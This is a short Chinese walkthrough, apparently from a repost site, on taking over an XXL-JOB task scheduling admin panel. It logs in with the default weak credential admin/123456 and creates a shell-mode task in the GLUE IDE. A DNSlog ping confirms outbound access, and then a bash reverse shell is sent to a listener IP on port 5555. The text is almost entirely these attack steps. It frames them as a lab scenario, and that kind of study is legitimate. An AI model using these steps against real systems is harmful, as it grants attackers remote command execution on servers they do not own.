访问漏洞场景,使用弱口令admin/123456,进入后台
在任务管理处新增
运行模式一定要选shell模式,其他的地方随便填
保存之后点击操作
选择GLUE IDE,我们可以通过DNSlog判断一下
ping xxxxx.dnslog.cn
然后我们保存,然后执行一次
刷新之后,出现下图情况,证明设备出网
DNSLog Platform
那我们就可以更改 GLUE IDE中的命令了,将shell反弹到我们监听的设备
/bin/bash -i >& /dev/tcp/监听IP/5555 0>&1
监听IP先进行监听,然后按照测试是否出网的时候执行一次,就将shell反弹到监听设备上了
文章来源地址https://www.toymoban.com/news/detail-759540.html
文章来源:https://www.toymoban.com/news/detail-759540.html
到了这里,关于XXL-JOB 任务调度中心 后台反弹getshell的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!